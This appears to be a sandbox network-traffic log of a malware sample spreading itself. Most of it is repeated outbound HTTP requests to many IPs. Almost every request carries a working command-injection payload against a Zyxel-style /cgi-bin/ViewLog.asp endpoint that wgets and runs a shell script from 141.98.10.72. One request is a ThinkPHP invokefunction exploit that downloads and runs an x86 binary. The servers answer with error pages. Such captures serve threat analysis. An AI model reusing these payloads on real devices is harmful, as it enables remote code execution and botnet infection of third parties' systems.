Feb 14, 2024 09:31:20.214978933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:03.222079039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
753	192.168.2.15	60206	31.136.140.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.503698111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:37.176215887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.520225048 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:41.304173946 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:46.679863930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.431593895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:20.214975119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:03.222055912 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
754	192.168.2.15	44616	95.34.204.6	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.510596037 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:36.816914082 CET	1286	IN	HTTP/1.1 401 Unauthorized Date: Wed, 14 Feb 2024 06:55:58 GMT WWW-Authenticate: Digest realm="sharedLogic", domain="", nonce="Hpxmpo0BAAAoKRjyZql8+lCLigPjn6ua", algorithm=MD5, qop="auth" Cache-Control: must-revalidate,no-cache,no-store Content-Type: text/html;charset=ISO-8859-1 Content-Length: 1292 Server: Jetty(8.1.14.v20131031) Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 31 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 401 Unauthorized</title></head><body><h2>HTTP ERROR: 401</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Unauthorized</pre></p><hr /><i><small>Powered by Jetty://</small></i>

Session ID	Source IP	Source Port	Destination IP	Destination Port
755	192.168.2.15	46844	95.168.248.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.524635077 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:36.749803066 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
756	192.168.2.15	43830	95.214.235.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.530667067 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
757	192.168.2.15	50878	94.121.53.44	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.546752930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
758	192.168.2.15	45518	94.121.216.93	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.555936098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
759	192.168.2.15	50484	94.122.67.135	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.557621956 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
760	192.168.2.15	39524	94.120.246.22	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.559815884 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
761	192.168.2.15	48354	95.86.115.190	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.561788082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
762	192.168.2.15	38176	95.51.116.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.596601009 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
763	192.168.2.15	46878	95.168.248.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.975956917 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
764	192.168.2.15	45418	112.83.36.62	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.980155945 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.323183060 CET	1286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:37 GMT Content-Type: text/html Content-Length: 2813 Connection: close x-ws-request-id: 65cc7a2d_xian62_13217-6361 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 30 38 3a 33 30 3a 33 37 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 78 69 61 6e 36 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 14 Feb 2024 08:30:37 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: xian62<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp
Feb 14, 2024 09:30:37.323220015 CET	432	IN	Data Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
Feb 14, 2024 09:30:37.323261023 CET	1286	IN	Data Raw: 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 Data Ascii: ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65cc7a2d_xian62_13217-6361<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hide_me P H"><div cl
